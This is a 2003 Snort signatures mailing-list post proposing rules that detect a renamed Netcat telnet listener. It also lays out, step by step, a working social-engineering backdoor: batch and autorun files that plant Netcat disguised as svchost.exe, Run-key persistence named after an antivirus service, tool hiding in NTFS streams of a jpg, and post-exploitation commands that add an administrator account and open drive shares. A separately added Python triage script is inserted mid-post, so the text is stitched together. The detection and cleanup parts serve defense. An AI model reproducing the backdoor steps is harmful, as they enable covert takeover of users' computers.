[Snort-sigs] Netcat telnet attack signature (change 1)

Graham, Jeffery A. MAJ - G6 Jeffery.graham at ...1848...
Tue Sep 16 06:47:10 EDT 2003


UPDATE: Cleaned up the crash caused by the Reference syntax error and
uppercase "A" on alert.



alert tcp $TELNET_SERVERS any -> any any (msg:"TELNET Netcat Remote Shell Exploit"; flow:from_server,established; content:"|5c 77 69 6e|"; nocase; classtype:shellcode-detect;)

alert tcp $TELNET_SERVERS any -> any any (msg:"TELNET Netcat shell exploit"; flow:from_server,established; content:"|3e|"; classtype:shellcode-detect;)



Sid: Not assigned; it belongs in the 700 series (telnet-based command shell).




Detects a Netcat.exe listener planted on a Windows client, regardless of what
Netcat.exe has been renamed, serving a telnet-style session on any port:
Netcat hands the connecting party a command shell that runs with the
credentials of the user logged on to the listening host.  Issuance of a
command shell prompt from server to client is not part of a normal telnet
logon.  Note that these rules only see sessions whose server side falls
inside $TELNET_SERVERS, which snort.conf sets to $HOME_NET by default, so a
listener on a host outside that variable is not covered.  The stock rule SID
2123 (ATTACK-RESPONSES Microsoft cmd.exe banner) also catches the shell, but
it excludes source ports 21 through 23 (!21:23; see False Positives, below).


|3e| is the hex value of the prompt character ">" and matches any ">" sent
from the server side of the session to the client.  Because it is a single
byte that also occurs in HTML, e-mail and many other protocols, this rule
fires on any ">" that any host in $TELNET_SERVERS sends on any port; it is the
broad match of the pair and is best run alongside the |5c 77 69 6e| rule or
restricted to the ports actually in use.


|5c 77 69 6e| is the hex encoding of "\win" (\windows, \winnt, \win32,
\winnt\system32, etc.) and matches a Windows system path in the prompt that
the server side sends to the client.  Snort content matches are
case-sensitive unless the nocase modifier is given, and cmd.exe prints the
current directory as it is named on disk (C:\WINNT> on NT/2000, C:\WINDOWS>
on XP, both upper case by default), so the content match needs nocase to
catch the prompt as it is first displayed.


alert tcp $TELNET_SERVERS any -> $HOME_NET any (msg:"TELNET Netcat shell exploit"; flow:from_server,established; content:"|3e|"; classtype:shellcode-detect;)

alert tcp $TELNET_SERVERS any -> $HOME_NET any (msg:"TELNET Netcat shell exploit"; flow:from_server,established; content:"|5c 77 69 6e|"; nocase; classtype:shellcode-detect;)

alert tcp $TELNET_SERVERS any -> $EXTERNAL_NET any (msg:"TELNET Netcat shell exploit"; flow:from_server,established; content:"|3e|"; classtype:shellcode-detect;)

alert tcp $TELNET_SERVERS any -> $EXTERNAL_NET any (msg:"TELNET Netcat shell exploit"; flow:from_server,established; content:"|5c 77 69 6e|"; nocase; classtype:shellcode-detect;)


Rules may be reduced to two by changing $EXTERNAL_NET and $HOME_NET to any.







Detailed Information:



Netcat Social Engineering Exploit (NSEE)


The NSEE consists of three files plus an autorun.inf:

-svchost.exe (Netcat, could be renamed anything...bios.exe, etc.)

-start.bat (could be renamed anything...picview.bat, etc.)

-short.lnk (a shortcut that carries the Netcat command line and is referenced
from the Run key so that it is executed at each boot and logon)

I have included an autorun.inf for burning to CD-ROM for self-install on
autorun-enabled CD-ROMs.



Execute start.bat, which has the following entries:

@echo off
copy svchost.exe %systemroot%\
copy short.* %systemroot%\
regedit.exe /s "keyname:keyvalue" (a .reg file whose value data points at short.lnk)




The autorun.inf will execute start.bat automatically if burned to a CD-ROM.

The following occurs:

Netcat is copied as svchost.exe to %systemroot%\ (the name blends in with the
genuine svchost.exe processes; the real %systemroot%\system32\svchost.exe is
not touched).

short.lnk is copied to %systemroot%.

The registry key "keyname:keyvalue" (with short.lnk as its value data) is
imported into the Registry.

short.lnk is executed and the batch ends.


What has been accomplished? All required files are copied to %systemroot%,
where they are less likely to be deleted by the user or administrator.
short.lnk is set to run svchost.exe (Netcat.exe) with several command line
options; its target reads %systemroot%\svchost.exe -d -l -p (port) -t -e
cmd.exe -L, and it is started immediately.

The registry key ensures that Netcat is restarted at each reboot or logon
without showing up in the Startup folder.  Running short.lnk from the batch
starts the listener immediately, without a logoff/logon or restart.


The Netcat flags and options accomplish the following:

-d detach from the console (no window is shown)

-l listen for an inbound connection

-p 23 on port 23 (could be any port; the example used port 9056)

-t answer telnet option negotiation automatically

-e cmd.exe execute cmd.exe for the connecting client, with the victim's
privileges (could be any program)

-L maintain persistence: the Windows port's "listen harder" option, which
goes back to listening after the client disconnects.



Netcat ADS Proof of Concept


NTFS supports alternate data streams (ADS), so this variation packs the
support files into a .jpg with the command type [location]\file >
[location]\file.jpg:file.ext.  Streams survive only on NTFS volumes under an
ADS-aware operating system: they are preserved when the file is copied
between NTFS volumes on a LAN (Windows file sharing carries them), but an
e-mail attachment or an HTTP download transfers only the primary data stream,
so the packed files do not survive those paths.  I have tested the ADS
streams passed by email with very limited success.  Because moving the
ADS-packed file to a non-NTFS partition strips the alternate streams, passage
by floppy disk is not feasible.  However, I was able to format a 1 Gigabyte
USB drive as NTFS, which preserved the packed ADS file and made it portable.


For this proof of concept I packed four files into the .jpg:

-Shhhhh!.lnk (a shortcut with the options set as previously discussed)

-Shhhhh!.reg (a registry import, applied with regedit /s, which suppresses
the confirmation prompt)

-Svchost.exe (Netcat.exe renamed to pass as a legitimate process)

-Ads-cp.exe (an ADS copy program by Randy Miller that copies files into and
out of alternate data streams)



Netcat ADS Preparation


First, select an interesting file that others might wish to download or
view.  Then prepare each packed file in turn.  Rename Netcat.exe to
svchost.exe or any other legitimate-sounding Windows process name.  Put
svchost.exe in the %systemroot% directory of a donor machine and create a
desktop shortcut for it with the target options set as previously discussed
to create the telnet listener.  The donor copy must sit at the same path it
will have on the victim, because the shortcut records an absolute target and
is invalid otherwise.  Once the shortcut is created, the svchost.exe in the
donor machine's %systemroot% may be removed.  Next, prepare the registry
entry.


The registry entry is, as follows:


Windows Registry Editor Version 5.00





The Ads-cp.exe file will be used to copy and extract the ADS as required.


Now, pack all four prepared files into the jpg or other interesting file.
In this test, I packed:


Shhhhh!.lnk ---> into mywife.jpg

Shhhhh!.reg ---> into mywife.jpg

Svchost.exe ---> into mywife.jpg

Ads-cp.exe ----> into mywife.jpg


A Crucial Security ADS scan of the file reveals the following:


!!! ADS FOUND !!! Name=:ads-cp.exe:$DATA File=C:\\mywife.jpg

!!! ADS FOUND !!! Name=:shhhhh!.lnk:$DATA File=C:\\mywife.jpg

!!! ADS FOUND !!! Name=:shhhhh!.reg:$DATA File=C:\\mywife.jpg

!!! ADS FOUND !!! Name=:svchost.exe:$DATA File=C:\\mywife.jpg


Windows NTFS maintains the streams but does not display them under normal
circumstances; a directory or file listing shows only the size of the primary
(original) file.


Finally, a startwife.bat is created with the following entries:

@echo off
copy mywife.jpg %systemroot%
start %systemroot%\mywife.jpg:ads-cp.exe mywife.jpg:svchost.exe
start %systemroot%\mywife.jpg:ads-cp.exe mywife.jpg:shhhhh!.lnk
start %systemroot%\mywife.jpg:ads-cp.exe mywife.jpg:shhhhh!.reg
regedit.exe /s %systemroot%\shhhhh!.reg
del %systemroot%\shhhhh!.reg





This batch turns the streams back into usable files by:

Copying mywife.jpg to %systemroot%.

Extracting shhhhh!.lnk, shhhhh!.reg and svchost.exe to %systemroot%, using
the ads-cp.exe that is itself run straight out of a stream.

Importing shhhhh!.reg with regedit /s, which adds a new Run value with
shhhhh!.lnk as its data and suppresses the confirmation prompt.  In this case
the value is called rtvscan, to pass as Symantec's real-time virus scanner
(rtvscan.exe).

Executing the shortcut immediately, without a reboot or logoff/logon, while
the picture is displayed for the victim.  For cleanup, shhhhh!.reg is deleted
from %systemroot%.



The Attack Aftermath (Penetration and Escalation)

When the attacking computer telnets to the victim (telnet victim port), it
receives a command shell running with the victim's user rights
(administrator, power user, etc.) directly on the victim's computer, without
the victim's knowledge.  The command dir a:\ lists the victim's floppy drive;
rmdir /s /q would attempt to delete a whole directory tree without
confirmation.  Use your imagination to figure out all the menace that could
be accomplished via the command shell.

Since short.lnk was registered under the Run key, the listener starts at
every reboot and logon, and with luck and patience you may score
administrator rights: delete or rename some system files, cause some general
havoc, and most users will call for a system administrator to check out their
computer problems.



net user hacker hacker /add (a bit obvious)

net localgroup administrators hacker /add (adds the account to the local
Administrators group)


If you were able to add yourself to the local group, and the drives are
shared or the hidden administrative shares (admin$, c$) are present, open
\\IP_Address\admin$ or \\IP_Address\c$ in Explorer (c$ if C: is the system
drive; a directory listing over the Netcat shell tells you which drive that
is).  If the drives are not shared, see below and try again.


How about unlimited access and drive sharing?

net share root=c:\ /unlimited

net share adrive=a:\ /unlimited

net share cdrive=c:\ /unlimited

net share ddrive=d:\ /unlimited

net share edrive=e:\ /unlimited


If the commands succeed, you have GUI access to the machine by opening
Explorer and typing \\IP_Address\root, \\IP_Address\adrive, etc.


Registry edits are now possible through the command line.


If you're not being stealthy and want to get them in trouble, how about

Start www[.]whitehouse[.]com 



Affected Systems:

The NSEE can affect server and workstation versions of Windows NT, 2000, and
XP Home and Professional, using documented Netcat syntax and options.

The NSEE can also affect Windows 9x and ME with minor scripting
modifications.

The Netcat ADS variant (NADS) affects only systems with NTFS volumes, i.e.
server and workstation versions of Windows NT, 2000, and XP Home and
Professional.



Attack Scenarios:

Exploits the logged-on user's computer within 3 seconds of physical access to
the floppy, USB or CD-ROM drive (use the autorun.inf), turning it into a
telnet listener even if file and print sharing is disabled or the host is
firewalled.  It could also be delivered over the Internet, the LAN or e-mail
by social engineering (e.g. nudepics.bat, antivirs.bat, etc.).



Ease of Attack:



False Positives:

The |5c 77 69 6e| rule fires whenever a genuine telnet server sends a \win
string to the client, for example in a directory listing.  The |3e| rule
fires on any ">" sent by a host in $TELNET_SERVERS on any port, which
includes HTML served by a web server in that range, so expect noise from it
on a busy network.  SID 2123 also catches the cmd.exe banner, except when the
port Netcat listens on is 21 through 23, because SID 2123 is written to
ignore those source ports (!21:23); the rules above cover that gap.

False Negatives:

No false negatives have been produced to date.


Corrective Action:

Virus scanners will not pick up the attack.  Because the files were renamed
and placed in %systemroot%, most users and administrators will not notice
them.  In the graphical user interface, Windows even assists by warning the
user that this is a system folder and that files in it should not be
modified.

After installation, the listener can be found only by looking at processes
and ports: Ctrl-Alt-Del, Task Manager, pslist or fport (fport shows the
listening port whether or not a connection has been made).  The Netcat
listener is not listed on the Applications tab but on the Processes tab, as
svchost.exe, with the User Name column showing the logged-on user, where a
genuine svchost.exe runs as SYSTEM, NETWORK SERVICE or LOCAL SERVICE.  Had
Netcat been renamed to smsapm32.exe or something similar, detection would be
just as hard.  If the victim is running a personal firewall, Netcat will ask
for permission to listen the first time it runs as svchost.exe.  While the
attacker is using the shell, a cmd.exe also appears on the Processes tab.
Detection, even by a skilled user, is unlikely.  The victim could also notice
the new Run value in the Registry, in this case named rtvscan (also highly
unlikely).




 If attacker inadvertently runs executables such as cleanmgr.exe, it will
cause pop-ups on the victim computer.  They may believe they've been
infected with a virus and begin to investigate.  This can be fun, but is not
very stealthy.





Killing the process in Task Manager only stops the listener until the next
reboot.  The victim must also remove the entry from the Run key in the
Registry, then search for the executable and delete it from %systemroot%\ or
wherever it was installed.  Pslist, Pskill and Fport help track down the
offending files, whatever their names.  Drivers, from the Windows 2000
Resource Kit, lists the loaded drivers.
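Added example, not part of the original post: a Python triage pass over two text artifacts an administrator can pull from a suspect host, a regedit export of the Run key and an fport-style process-to-port listing. Both inputs are constructed here (the fport column layout is approximated, and the svchost, rtvscan and mywife.jpg names are taken from the description above), and the checks encode the indicators this section describes: an autostart value that launches a .lnk, a listener whose image carries a system-process name but lives in %systemroot% instead of %systemroot%\system32, and an image run straight out of an alternate data stream. The function and variable names are my own.

```python
"""Triage of a Run-key export and an fport-style listing for the indicators
described in the post. Both inputs are constructed for this example."""
import ntpath
import re

# Processes that legitimately run only from %systemroot%\system32.
SYSTEM32_ONLY = {"svchost.exe", "lsass.exe", "services.exe", "winlogon.exe",
                 "csrss.exe", "smss.exe", "spoolsv.exe"}

# Constructed regedit 5.00 export (regedit doubles backslashes in strings).
REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Synchronization Manager"="mobsync.exe /logon"
"rtvscan"="C:\\WINNT\\shhhhh!.lnk"
"""

# Constructed fport-style output; column layout approximated.
FPORT_OUTPUT = r"""Pid   Process            Port  Proto Path
392   svchost        ->  135   TCP   C:\WINNT\system32\svchost.exe
1344  svchost        ->  9056  TCP   C:\WINNT\svchost.exe
1412  svchost        ->  9057  TCP   C:\WINNT\mywife.jpg:svchost.exe
"""


def first_token(cmdline: str) -> str:
    """Program part of an autostart command line (quoted path or first word)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:].split('"', 1)[0]
    return cmdline.split(None, 1)[0] if cmdline else ""


def parse_reg_autostarts(reg_text: str):
    """Yield (key, name, command) for values under a ...\\Run or ...\\RunOnce key."""
    key = None
    for line in reg_text.splitlines():
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            key = m.group(1)
            continue
        m = re.match(r'^"([^"]+)"="(.*)"$', line)
        if m and key and key.lower().endswith(("\\run", "\\runonce")):
            yield key, m.group(1), m.group(2).replace("\\\\", "\\")


def parse_fport(fport_text: str):
    """Parse lines of the form: pid process -> port proto path."""
    rx = re.compile(r"^(\d+)\s+(\S+)\s+->\s+(\d+)\s+(TCP|UDP)\s+(.+?)\s*$")
    for line in fport_text.splitlines():
        m = rx.match(line)
        if m:
            yield {"pid": int(m.group(1)), "port": int(m.group(3)),
                   "proto": m.group(4), "path": m.group(5)}


def outside_system32(path: str) -> bool:
    """True for a system-process name whose image is not under \\system32."""
    name = ntpath.basename(path).lower()
    parent = ntpath.dirname(path).lower()
    return name in SYSTEM32_ONLY and not parent.endswith("\\system32")


def from_alternate_stream(path: str) -> bool:
    """A colon after the drive specifier means file.ext:stream (NTFS ADS)."""
    _drive, rest = ntpath.splitdrive(path)
    return ":" in rest


def triage(reg_text: str, fport_text: str) -> list:
    """Return human-readable findings for the indicators described above."""
    findings = []
    for key, name, cmd in parse_reg_autostarts(reg_text):
        target = first_token(cmd)
        if target.lower().endswith(".lnk"):
            findings.append(f"autostart {name!r} in {key} runs a shortcut: {target}")
        elif outside_system32(target):
            findings.append(f"autostart {name!r} runs a system-process name "
                            f"outside system32: {target}")
    for entry in parse_fport(fport_text):
        path = entry["path"]
        where = f"pid {entry['pid']} listens on {entry['proto']}/{entry['port']}"
        if from_alternate_stream(path):
            findings.append(f"{where} from an alternate data stream: {path}")
        elif outside_system32(path):
            findings.append(f"{where} as {ntpath.basename(path)} "
                            f"outside system32: {path}")
    return findings


if __name__ == "__main__":
    for finding in triage(REG_EXPORT, FPORT_OUTPUT):
        print(finding)
```

The genuine svchost.exe on port 135 under system32 is left alone; the rtvscan value pointing at a .lnk, the second svchost.exe living directly in %systemroot%, and the image executed from mywife.jpg:svchost.exe are each reported. ntpath is used so the Windows path handling also works when the export is examined on a non-Windows analysis box.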






It is imperative that all users lock their workstations when they leave their
desks (Ctrl-Alt-Del, Lock Computer).  This prevents insertion of the exploit
under their credentials and, possibly later, under Administrative
credentials.  Users should also never open and run e-mail attachments such as
batch files or executables.  Since these exploits do not trigger virus
scanners, do not depend on them to protect you from backdoors or ADS.


Servers should be in a locked, secure room with all access ports (USB,
floppy/removable, FireWire, serial, parallel, mouse and keyboard) covered and
locked.  Servers and critical workstations should periodically have their
driver list compared against a known baseline; compare and analyze the
differences.  For example:

Drivers > baseline20030701 (stored and MD5 check-summed)

Drivers > new20030730

FC /N baseline20030701 new20030730

Check with your network administrator whether personal firewalls are allowed
on the network; if so, they will alert you when the telnet listener starts
and when a command shell is handed to a remote user.




Jeff Graham, jgraham61 at ...12...



Additional References:

Snort 2.0 alert log:

[**] [1:0:0] TELNET Netcat shell exploit [**]
[Classification: Executable code was detected] [Priority: 1]
09/09-16:20:06.769891 0:0:4C:F3:D:65 -> 0:0:4C:F3:82:5C type:0x800 len:0x9F -> TCP TTL:128 TOS:0x0 ID:1890 IpLen:20 DgmLen:145 DF
***AP*** Seq: 0x296A74F4  Ack: 0x113CFFF2  Win: 0x4470  TcpLen: 20

Hobbit, Netcat for Unix and documentation, 1996, <http://www.@...1849.../>

@stake, Netcat 1.1 for Windows, Hobbit and Chris Wysopal, 1998, <http://www.@...1849.../>

Foundstone, Fport, <http://www.foundstone.com/> (Pslist and Pskill are Sysinternals tools)

Microsoft Corp., Drivers, Windows 2000 Resource Kit, 1985-2000, <http://www.microsoft.com/>

Randy Miller, Sytex, ADS copy (Ads-cp.exe), 2002

Scot Wiedenfeld, Sytex, 2003

Crucial Security, Crucial ADS, 2000, <http://www.crucialsecurity.com/>




Major Jeffery A. Graham


Joint Warfighter Support Division

Information Assurance Branch


367-6654 DSN

